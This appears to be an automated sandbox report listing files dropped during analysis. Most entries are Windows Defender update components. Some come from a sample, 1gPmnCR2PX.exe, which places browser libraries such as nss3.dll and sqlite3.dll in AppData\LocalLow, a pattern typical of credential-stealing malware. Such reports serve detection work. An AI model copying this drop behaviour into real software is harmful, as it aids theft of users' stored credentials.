Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B627A379-2F05-4FC9-AE9A-5C8B44C71D64\MpSigStub.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B627A379-2F05-4FC9-AE9A-5C8B44C71D64\mpasbase.vdm Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\nl-NL\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\ug-CN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File created: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\AccessibleHandler.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\hu-HU\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\pa-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\de-DE\ProtectionManagement.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\sv-SE\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\uk-UA\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpClient.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\ml-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\Drivers\WdNisDrv.sys Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\de-DE\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File created: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\libEGL.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\cs-CZ\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\eu-ES\mpuxagent.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File created: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\api-ms-win-core-interlocked-l1-1-0.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpRtp.dll Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File created: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\api-ms-win-core-sysinfo-l1-1-0.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\tr-TR\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File created: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\api-ms-win-crt-multibyte-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File created: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\api-ms-win-crt-runtime-l1-1-0.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\x86\MpCmdRun.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\pt-BR\ProtectionManagement.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\id-ID\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\ru-RU\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\he-IL\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\zh-CN\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\x86\MsMpLics.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\nb-NO\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\el-GR\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\fi-FI\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\sl-SI\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\mt-MT\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpAzSubmit.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\th-TH\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\ko-KR\ProtectionManagement.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\kok-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\lo-LA\mpuxagent.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File created: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\prldap60.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\zh-TW\mpuxagent.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File created: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\nss3.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\endpointdlp.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\DefenderCSP.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-796ed98e.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B627A379-2F05-4FC9-AE9A-5C8B44C71D64\mpavdlta.vdm Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\fr-FR\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\pt-BR\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File created: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\nssckbi.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\ta-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\uk-UA\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\kk-KZ\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\pl-PL\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\en-US\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\pt-BR\mpuxagent.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File created: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\api-ms-win-core-heap-l1-1-0.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MsMpLics.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\en-GB\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\id-ID\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\ar-SA\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\ko-KR\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\mi-NZ\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B627A379-2F05-4FC9-AE9A-5C8B44C71D64\MpSigStub.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B627A379-2F05-4FC9-AE9A-5C8B44C71D64\mpavbase.vdm Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\Drivers\WdBoot.sys Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\gd-GB\mpuxagent.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File created: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\api-ms-win-core-libraryloader-l1-1-0.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\lv-LV\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\sl-SI\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\nl-NL\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\en-US\ProtectionManagement.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File created: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\MapiProxy.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\es-ES\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\gu-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\nn-NO\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\ca-ES\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File created: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\breakpadinjector.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\fr-FR\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File created: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\api-ms-win-crt-environment-l1-1-0.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\pl-PL\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File created: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\api-ms-win-core-processthreads-l1-1-0.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\ru-RU\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\tt-RU\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpCommu.dll Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File created: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\api-ms-win-core-file-l2-1-0.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\ko-KR\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File created: C:\Users\user\AppData\LocalLow\sqlite3.dll Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File created: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\IA2Marshal.dll Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File created: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\api-ms-win-core-synch-l1-2-0.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\hr-HR\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\hi-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File created: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\msvcp140.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\is-IS\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\cy-GB\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\fi-FI\mpuxagent.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File created: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\api-ms-win-crt-filesystem-l1-1-0.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\sk-SK\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\nb-NO\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\quz-PE\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\ro-RO\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpDetoursCopyAccelerator.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\af-ZA\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\lv-LV\mpuxagent.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File created: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\api-ms-win-core-synch-l1-1-0.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\sr-Latn-RS\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\sv-SE\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\kn-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File created: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\api-ms-win-core-processenvironment-l1-1-0.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\da-DK\MpAsDesc.dll.mui Jump to dropped file
Drops PE files to the windows directory (C:\Windows)
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\ConfigSecurityPolicy.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\x86\MpAsDesc.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\lb-LU\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\sq-AL\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\mpextms.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\NisSrv.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\pt-PT\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\cs-CZ\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\zh-CN\MpEvMsg.dll.mui Jump to dropped file
